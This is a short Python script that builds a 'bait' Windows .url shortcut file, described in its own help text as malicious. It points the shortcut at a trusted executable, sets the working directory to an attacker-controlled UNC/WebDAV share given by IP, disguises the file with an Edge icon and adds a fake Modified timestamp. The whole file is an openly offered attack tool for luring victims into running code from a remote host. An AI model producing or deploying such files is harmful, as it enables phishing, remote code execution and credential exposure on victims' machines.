1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
import argparse
def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
with open(output_file, "w", encoding="utf-8") as f:
f.write(content)
print(f"[+] .url file created: {output_file}")
def main():
parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
parser.add_argument('--out', default="bait.url", help="Output .url file name")
parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
help="Target executable path on victim machine")
parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
help="Icon file path")
parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")
args = parser.parse_args()
working_directory = fr"\\{args.ip}\{args.share}\\"
generate_url_file(
output_file=args.out,
url_target=args.exe,
working_directory=working_directory,
icon_file=args.icon,
icon_index=args.index,
modified=args.modified
)
if __name__ == "__main__":
main()
|